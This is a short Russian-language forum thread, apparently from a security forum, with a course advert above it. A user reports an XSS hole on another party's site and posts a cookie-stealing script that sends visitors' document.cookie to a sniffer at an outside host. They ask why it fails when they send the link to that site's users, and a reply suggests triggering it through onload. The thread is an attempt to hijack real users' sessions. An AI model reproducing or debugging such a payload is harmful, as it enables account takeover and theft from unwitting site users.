• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Нужна помощь по XSS

skynett

New member
11.04.2021
1
0
BIT
0
Здравствуйте уважаемые форумчане нужна ваша помощь ) Была обнаружена XSS уязвимость на одном из сайтов при вводе
Код:
<script>alert(document.cookie)</script>
сайт показывает мне мои куки и с этого я сделал вывод что сайт уязвим. На одном форуме дали код сниффера он отлично работает проверил на одном из своих сайтов.Но дело в том что когда я даю пользователю данного сайта уязвимою ссылку типа
Код:
<script>img = new Image();img.src="http://domain.ru/sniff.php?cookie="+document.cookie;</script>
и он по ней проходит куки не отправляются что можно сделать ?
 

glOOk137

New member
22.07.2021
1
0
BIT
0
У тебя изображение отображается из пути "+document.cookie
А должен код выполниться при загрузке изображения.
Пробуй через onload
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!